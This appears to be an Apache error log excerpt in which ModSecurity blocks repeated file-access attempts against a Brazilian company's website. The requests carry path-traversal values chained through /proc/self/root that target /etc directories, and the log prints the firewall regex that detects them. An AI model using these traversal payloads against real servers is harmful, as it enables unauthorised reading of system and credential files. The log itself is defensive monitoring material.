[Mon Mar 16 10:32:13.067264 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:47606] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGXY6lpbStxTqkSktg2QAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:32:14.583130 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:32892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGXrABkC4fWIHEf8HfYQAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:16.926862 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.241.46:32902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGYJqj1wV0Si-OkefdMQAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:21.992466 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:56646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGZLysWC90G-1nBrA4qQAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:24.704526 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.241.46:56660] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGaNSswJuvopo3lOhTHAAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:30.331639 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.241.46:56670] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGbnjZBu2q05ozVU9I8gAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:31.606873 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.241.46:60084] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGb3bQATo66fKoS7xAgQAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:32.650581 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.243.203:41156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGcLysWC90G-1nBrA4vgAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:33.798772 2026] [:error] [pid 10709:tid 140411548894976] [client 74.7.241.46:60092] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGcRXjF1vJNtV6CWrsmwAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:33.959061 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:39040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGcbABkC4fWIHEf8HfZgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:35.107383 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:60094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGc46lpbStxTqkSktg3AAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:49.458208 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.241.46:60100] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGgZqj1wV0Si-OkefdQgAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:50.754978 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:42424] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGgo6lpbStxTqkSktg3QAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:32:53.998705 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:42432] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGhbABkC4fWIHEf8HfewAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:33:15.592813 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.241.46:42446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGm3bQATo66fKoS7xAlgAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:33:16.843704 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.241.46:45494] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGnHjZBu2q05ozVU9I_gAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:33:18.000294 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.241.46:52202] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGnZqj1wV0Si-OkefdSgAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:33:21.377026 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.241.46:52218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGoRXjF1vJNtV6CWrsqAAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:33:25.040911 2026] [:error] [pid 10709:tid 140411548894976] [client 74.7.244.31:37640] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgGpRXjF1vJNtV6CWrsqQAAAdc"]
[Mon Mar 16 10:33:33.983167 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.241.46:52224] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGrQlT9VtDQc7bgUygFAAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:33:41.308519 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:49626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGtdSswJuvopo3lOhTMwAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:33:55.590531 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:47662] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGw7ysWC90G-1nBrA5IAAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:33:59.169666 2026] [:error] [pid 11972:tid 140411574073088] [client 74.7.241.46:36492] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGx5qj1wV0Si-OkefdVgAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:34:07.249175 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:39044] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 